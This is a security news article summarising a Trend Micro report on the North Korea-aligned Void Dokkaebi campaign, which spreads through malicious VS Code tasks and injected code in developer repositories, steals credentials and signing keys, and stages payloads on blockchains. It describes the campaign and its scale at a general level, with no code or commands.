Void Dokkaebi Unmasked: The “Worm-Like” Supply Chain Threat Targeting Developers

A new report from researchers at TrendMicro has exposed the evolution of Void Dokkaebi (also known as Famous Chollima), a North Korea-aligned intrusion set that has transitioned from traditional social engineering to a self-propagating supply chain threat. The campaign is specifically designed to hunt software developers, seeking to harvest cryptocurrency credentials, signing keys, and high-value access to CI/CD pipelines.

What makes this campaign particularly dangerous is its ability to turn a victim into a vector. As the report notes, “A compromised developer’s repository becomes an infection vector for the next wave of victims, creating a worm-like propagation chain through the developer ecosystem”.

The campaign spreads by embedding itself into trusted development workflows. Attackers utilize malicious Visual Studio Code (VS Code) task configurations and injected code that activates during normal, everyday coding activities.

Once a developer’s local environment is compromised, the infection can spread horizontally:

• Organizational Exposure: When infected code is pushed to corporate repositories, it can compromise entire teams.
• Open-Source Contamination: Popular public projects can become “super-spreaders,” infecting contributors, downstream projects, and anyone who forks or clones the repository.

Analysis conducted in March 2026 revealed a staggering breadth of infection across the global coding landscape:

• 750+ Infected Repositories: Researchers identified over 750 public repositories carrying infection markers.
• 500+ Malicious VS Code Tasks: More than 500 configurations were found designed to execute malicious code.
• 101 Commit Tampering Tools: Evidence showed the threat actor had active remote access to at least 101 machines, using specialized tools to deliberately weaponize repositories.

The report highlights that the threat is not limited to independent developers. Repositories belonging to established organizations, such as DataStax and Neutralinojs, were also identified as carrying infection markers.

To ensure their delivery systems remain resilient against traditional security takedowns, Void Dokkaebi has turned to decentralized technology. The campaign uses blockchain infrastructure—including Tron, Aptos, and Binance Smart Chain—for staging its payloads. This tactic places the heart of their infrastructure beyond the reach of standard web hosting takedowns and law enforcement interventions.

Researchers warn that the numbers found in public scans represent only the tip of the iceberg. The actual scale is likely much larger, as the data does not account for:

• Private Repositories: Internal corporate code not indexed by public search tools.
• Cleaned Repositories: Projects that were infected and remediated before the scan took place.
• Unobserved Forks: Clones and forks that propagated the infection into environments researchers cannot monitor.

The Void Dokkaebi campaign represents a shift toward a self-sustaining model of cyber-espionage. By making a “relatively small, initial investment in social engineering,” the group has produced a massive, cascading infection surface.